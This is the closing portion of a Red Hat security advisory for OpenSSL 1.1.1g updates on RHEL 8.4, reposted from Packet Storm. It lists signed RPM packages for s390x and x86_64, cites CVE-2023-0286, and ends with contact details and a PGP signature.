openssl-debuginfo-1.1.1g-18.el8_4.s390x.rpm  
openssl-debugsource-1.1.1g-18.el8_4.s390x.rpm  
openssl-devel-1.1.1g-18.el8_4.s390x.rpm  
openssl-libs-1.1.1g-18.el8_4.s390x.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.s390x.rpm  
openssl-perl-1.1.1g-18.el8_4.s390x.rpm

x86_64:  
openssl-1.1.1g-18.el8_4.x86_64.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.i686.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.x86_64.rpm  
openssl-debugsource-1.1.1g-18.el8_4.i686.rpm  
openssl-debugsource-1.1.1g-18.el8_4.x86_64.rpm  
openssl-devel-1.1.1g-18.el8_4.i686.rpm  
openssl-devel-1.1.1g-18.el8_4.x86_64.rpm  
openssl-libs-1.1.1g-18.el8_4.i686.rpm  
openssl-libs-1.1.1g-18.el8_4.x86_64.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.i686.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.x86_64.rpm  
openssl-perl-1.1.1g-18.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7NzjgjWX9erEAQgfIBAAoZdbDRt1tK2saOKwSBubbkgrG/ObtOka  
yr2fVEt+JUBMWpuJxuUoMxp/tYhsYO0rJTuOXpjcpxGW1mcchp5CSRArNcPX7vrF  
YGWPMPPoAFQFAF5ST4V+jTlRTvhUBmlQlFAQEmogoX/pnqtUdI95rZXY7ELpnhQk  
SNKec7Iw+PcD1JNg80a6J95OjhHtNCM5tLhJgsIrb3kvhmPMzjnSh2UftTXKc1oE  
jzQjxTS9Zj/PZmY8vRnTIeYdx/aXdcjbnSOPnif0QRDiyOmZTdN081UwePbHJk9E  
8QDi72MSsbMuQjfVg6PtP+oZvALcBOxVV431ie3uivF3gosawPjnqUnaPfGK4eY2  
igpSt3KV4gDIlbxK2HhM+Mr+5RhnQ+nN5zY/Z362IAMsKhZ+C+M36K0CksNOZYqF  
56RjgvN4sI/oydTJ21RBBHpAf+Hl3BOpyTo2uj4YwUZY9Oa78VrQ9J+LM6bmP/G4  
1huLqDa8KwDFEsnbVcICHgVk0Iq0ioIK3IBsHhG85XLKPWgvLeSzaBxiwsNxwPlK  
4Wsqm6p60oj9R7xRIVkNatSJj505NXAAN0c2l7/hNUShcyRJqwnxAMO4xvVHlcuL  
aNqzrdA5Ichos1BkHXuT7cZp8nEp3eUPum0IzuPZe/2esOYpmKHCi1ptcSmgbx4u  
Lcf49d75pmE=LYX/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm